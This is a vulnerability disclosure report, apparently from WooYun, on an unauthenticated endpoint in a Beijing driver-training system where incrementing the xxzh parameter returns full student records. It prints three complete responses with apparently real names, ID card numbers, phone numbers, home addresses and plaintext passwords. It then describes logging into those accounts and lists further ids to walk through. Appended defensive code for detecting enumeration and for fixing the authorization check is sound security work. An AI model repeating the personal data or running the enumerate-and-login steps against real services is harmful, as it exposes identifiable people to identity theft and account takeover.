
Vulnerability summary

Defect ID: wooyun-2015-0156053

Title: Interface security flaw in a Beijing driver-training system leaks tens of thousands of users' ID card numbers, passwords, dates of birth and addresses

Affected vendor: a Beijing driver-training system

Author: 0x 80

Submitted: 2015-11-26 16:30

Fixed: 2016-01-14 16:02

Published: 2016-01-14 16:02

Vulnerability type: sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-26: Details sent to the vendor, awaiting the vendor's response
2015-11-30: Vendor confirmed the issue; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and domain experts
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public

Brief description:

An interface security flaw in a Beijing driver-training system leaks sensitive information (tens of thousands of users, with ID card details, passwords, dates of birth, addresses and driver-training records).
PS: the users' identity information is exposed at a glance.
Once again, a source-code problem.

Detailed description:

http://**.**.**.**
This is the login page.
The problem is at this endpoint:
http://**.**.**.**:8008/student/studyinfo?xxzh=51189710

[Screenshot: 99991.jpg]


Look at the response:

{ "data": { "_ST_IDCARD": "372922198702024816", "_SSFY": null, "ST_NO": "1180041421", "ST_ID": "51189710", "ST_NAME": "宋崇显", "ST_SEX": "0", "ST_BIRTHDAY": "1987/02/02 00:00:00", "ST_ADDR": "山东省曹县侯集回族镇宋堂行政村宋堂村119号", "LXDZ": "北京市海淀区双泉堡临288号210号", "ST_IDCARD": "372922198702024816", "ST_OTCARD": "0805201451467175", "ST_PHONE": null, "DH1": "", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "15801541129", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C20", "ST_LEADCARDDATE": "2014/03/26 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "870202", "ST_CLASSSIGN": "11800010", "ST_CLASSSName": "团体1-7直通车", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/03/26 00:00:00", "YXQ": "2017-03-26", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/07 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C20", "SQCXNAME": "爱丽舍", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "521", "STAUTSNAME": "", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "50", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "爱丽舍", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", "IS2FP": 
"0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


This is probably what we are most interested in.
First, pick out the key fields:
372922198702024816", "_SSFY": null, "ST_NO": "1180041421", "ST_ID": "51189710", "ST_NAME": "宋崇显", "ST_SEX": "0", "ST_BIRTHDAY": "1987/02/02 00:00:00", "ST_ADDR": "山东省曹县侯集回族镇宋堂行政村宋堂村119号", "LXDZ": "北京市海淀区双泉堡临288号210号"
It is obvious:
Username: 372922198702024816
Password: "ST_PWD": "870202"
Try logging in.
Because there is a firewall, I switched to another server to try.

[Screenshot: 9111.jpg]


Everything is visible at a glance:

Name: 宋崇显  Sex: male
ID card number: 372922198702024816  Study certificate number: 51189710
Date of birth: 1987-2-2  Phone: 15801541129
Enrolled class: 团体1-7直通车  Enrolled vehicle type: 爱丽舍
Enrolment date: 2014-3-7  Valid until: 2017-3-7


In this URL, http://**.**.**.**:8008/student/studyinfo?xxzh=51189710,
the xxzh parameter is not encrypted or protected in any way, which makes the impact severe: simply incrementing it by one walks through tens of thousands of records.
http://**.**.**.**:8008/student/studyinfo?xxzh=51189711

[Screenshot: 912.jpg]


{ "data": { "_ST_IDCARD": "513723199504140426", "_SSFY": null, "ST_NO": "1180042017", "ST_ID": "51189711", "ST_NAME": "杜洁", "ST_SEX": "1", "ST_BIRTHDAY": "1995/04/14 00:00:00", "ST_ADDR": "四川省平昌县江口镇国光村14社21号", "LXDZ": "北京市海淀区半壁店23号院9号楼121号", "ST_IDCARD": "513723199504140426", "ST_OTCARD": "0819201451704940", "ST_PHONE": null, "DH1": "苏晓丽代约", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "15810875131", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C20", "ST_LEADCARDDATE": "2014/04/12 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "950414", "ST_CLASSSIGN": "10000002", "ST_CLASSSName": "普通1-7", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/04/12 00:00:00", "YXQ": "2017-04-12", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/11 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C20", "SQCXNAME": "爱丽舍", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "0", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "421", "STAUTSNAME": "科目三满小时", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "50", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "爱丽舍", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", 
"IS2FP": "0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


Username: 513723199504140426
Password: 950414
Try logging in.

[Screenshot: 9119911.jpg]


Again, everything is visible at a glance.

[Screenshot: 99981.jpg]


**.**.**.**:8008/student/studyinfo?xxzh=51189713

{ "data": { "_ST_IDCARD": "321321198312092419", "_SSFY": null, "ST_NO": "1180041966", "ST_ID": "51189713", "ST_NAME": "吴彬", "ST_SEX": "0", "ST_BIRTHDAY": "1983/12/09 00:00:00", "ST_ADDR": "江苏省宿迁市宿豫区顺河镇蔡庄居委会一组20号", "LXDZ": "北京市海淀区挂甲屯18号101号", "ST_IDCARD": "321321198312092419", "ST_OTCARD": "0802201451343610", "ST_PHONE": null, "DH1": "", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "13261182923", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C24", "ST_LEADCARDDATE": "2014/03/26 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "wubin4283319", "ST_CLASSSIGN": "11800010", "ST_CLASSSName": "团体1-7直通车", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/03/26 00:00:00", "YXQ": "2017-03-26", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/07 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C24", "SQCXNAME": "富康", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "0", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "521", "STAUTSNAME": "", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "0", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "富康", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", "IS2FP": 
"0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


321321198312092419


wubin4283319


[Screenshot: 9999913.jpg]


I tested three records; there is far too much data to try them one by one.

Proof of vulnerability:

**.**.**.**:8008/student/studyinfo?xxzh=51189713


**.**.**.**:8008/student/studyinfo?xxzh=51189714
**.**.**.**:8008/student/studyinfo?xxzh=51189715
**.**.**.**:8008/student/studyinfo?xxzh=51189716
Increment-by-one logic: tens of thousands of records can be queried this way.
Then simply log in with the credentials returned.
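The enumeration described above leaves a distinctive trace in the web server's access log: one client requesting /student/studyinfo with many different, consecutive xxzh values in a short time. The following detection logic is an added example for defenders of such an endpoint; it is not part of the original report or of the affected system. The log lines are constructed for this example, and the window and threshold values are assumptions to be tuned for real traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format). The client IPs,
# timestamps and xxzh values are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Nov/2015:16:01:10 +0800] "GET /student/studyinfo?xxzh=51189710 HTTP/1.1" 200 2310
203.0.113.7 - - [26/Nov/2015:16:01:11 +0800] "GET /student/studyinfo?xxzh=51189711 HTTP/1.1" 200 2298
203.0.113.7 - - [26/Nov/2015:16:01:12 +0800] "GET /student/studyinfo?xxzh=51189712 HTTP/1.1" 200 2305
203.0.113.7 - - [26/Nov/2015:16:01:13 +0800] "GET /student/studyinfo?xxzh=51189713 HTTP/1.1" 200 2300
203.0.113.7 - - [26/Nov/2015:16:01:14 +0800] "GET /student/studyinfo?xxzh=51189714 HTTP/1.1" 200 2311
198.51.100.20 - - [26/Nov/2015:16:05:00 +0800] "GET /student/studyinfo?xxzh=51190001 HTTP/1.1" 200 2290
198.51.100.20 - - [26/Nov/2015:16:40:00 +0800] "GET /student/studyinfo?xxzh=51190001 HTTP/1.1" 200 2290
"""

# Only requests to the vulnerable endpoint are of interest.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET /student/studyinfo\?xxzh=(?P<xxzh>\d+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(log_text):
    """Yield (client_ip, timestamp, xxzh) for each studyinfo request in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], TS_FMT), int(m["xxzh"])


def find_enumerators(log_text, window=timedelta(minutes=5), min_distinct=4, min_run=3):
    """Return {ip: (distinct_ids, longest_consecutive_run)} for clients that
    requested at least `min_distinct` different xxzh values inside `window`,
    of which at least `min_run` form an unbroken +1 sequence. A normal student
    looks up only their own record, so this pattern is a strong signal."""
    per_ip = defaultdict(list)
    for ip, ts, xxzh in parse(log_text):
        per_ip[ip].append((ts, xxzh))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()  # chronological order
        start = 0
        for end in range(len(events)):
            # Slide the window so that events[start:end+1] fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            ids = sorted({x for _, x in events[start:end + 1]})
            if len(ids) < min_distinct:
                continue
            # Longest run of consecutive integers among the requested ids.
            run = best = 1
            for a, b in zip(ids, ids[1:]):
                run = run + 1 if b == a + 1 else 1
                best = max(best, run)
            if best >= min_run:
                flagged[ip] = (len(ids), best)
    return flagged


if __name__ == "__main__":
    for ip, (count, run) in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {count} distinct xxzh values, longest consecutive run {run}")
```

Run on the constructed log, the first client is flagged (five distinct ids forming a run of five within four seconds) while the second, which only re-requests a single record, is not. In production the same check would read the real access log and feed its output to an alerting pipeline; rate limiting alone is not a fix, because the underlying problem is the missing authorization check.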

Fix recommendation:

Input filtering and access control.
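The core defect is that the endpoint trusts the xxzh query parameter to decide whose record to return, and then serialises the whole database row, password included. The following added example (not code from the original report or from the affected system) shows the vulnerable shape of the handler beside a hardened version: the logged-in session, not the query string, determines which record may be read, and only an allow-list of fields is returned, with the ID card number masked. The student table, the session object and all values in it are constructed for the example; the field names follow the JSON keys seen in the report.

```python
# Constructed in-memory stand-in for the student table. Column names follow
# the JSON keys in the report; every value here is made up.
STUDENTS = {
    "51189710": {
        "ST_ID": "51189710", "ST_NAME": "Student A",
        "ST_IDCARD": "110101199001011234", "ST_BIRTHDAY": "1990/01/01 00:00:00",
        "ST_ADDR": "(home address)", "ST_HANDSET": "13800000000",
        "ST_PWD": "900101", "ST_CLASSSName": "Class 1", "YXQ": "2017-03-26",
    },
    "51189711": {
        "ST_ID": "51189711", "ST_NAME": "Student B",
        "ST_IDCARD": "110101199502025678", "ST_BIRTHDAY": "1995/02/02 00:00:00",
        "ST_ADDR": "(home address)", "ST_HANDSET": "13900000000",
        "ST_PWD": "123456", "ST_CLASSSName": "Class 2", "YXQ": "2017-04-12",
    },
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to read the requested record."""


def studyinfo_vulnerable(xxzh):
    """The handler as the report describes it: any caller supplies xxzh and
    receives the entire row, including ST_PWD and the full ID card number."""
    return {"data": STUDENTS.get(xxzh), "code": 0, "message": ""}


# Fields a student may legitimately see about their own record. ST_PWD, the
# raw ID card number, home address and internal columns are deliberately absent.
PUBLIC_FIELDS = ("ST_ID", "ST_NAME", "ST_CLASSSName", "YXQ")


def mask_idcard(idcard):
    """Show only the last four digits of an 18-digit ID card number."""
    return "*" * (len(idcard) - 4) + idcard[-4:]


def studyinfo_fixed(session, xxzh):
    """Hardened handler. `session` is the server-side session of the logged-in
    user (a dict with a "student_id" key in this example). The requested xxzh
    must match the session's own id; nothing else is ever returned."""
    if not session or "student_id" not in session:
        raise Forbidden("login required")
    if xxzh != session["student_id"]:
        # Object-level authorization: a student may read only their own record.
        raise Forbidden("not your record")
    row = STUDENTS.get(xxzh)
    if row is None:
        return {"data": None, "code": 1, "message": "not found"}
    data = {k: row[k] for k in PUBLIC_FIELDS}
    data["ST_IDCARD"] = mask_idcard(row["ST_IDCARD"])
    return {"data": data, "code": 0, "message": ""}


if __name__ == "__main__":
    print(studyinfo_vulnerable("51189711"))          # leaks ST_PWD
    print(studyinfo_fixed({"student_id": "51189710"}, "51189710"))
    try:
        studyinfo_fixed({"student_id": "51189710"}, "51189711")
    except Forbidden as e:
        print("blocked:", e)
```

The simplest robust variant drops the xxzh parameter entirely and reads the id from the session alone, so there is nothing for a client to increment. Storing ST_PWD in plaintext is a separate problem that the ownership check does not address; passwords should be stored as salted hashes and never be part of any API response.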

Copyright notice: when reposting, please credit the source as 0x 80@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-30 16:01

Vendor reply:

CNVD has confirmed the situation described and has notified the organisation operating the website through the contact details published on the site.

Latest status:

None yet

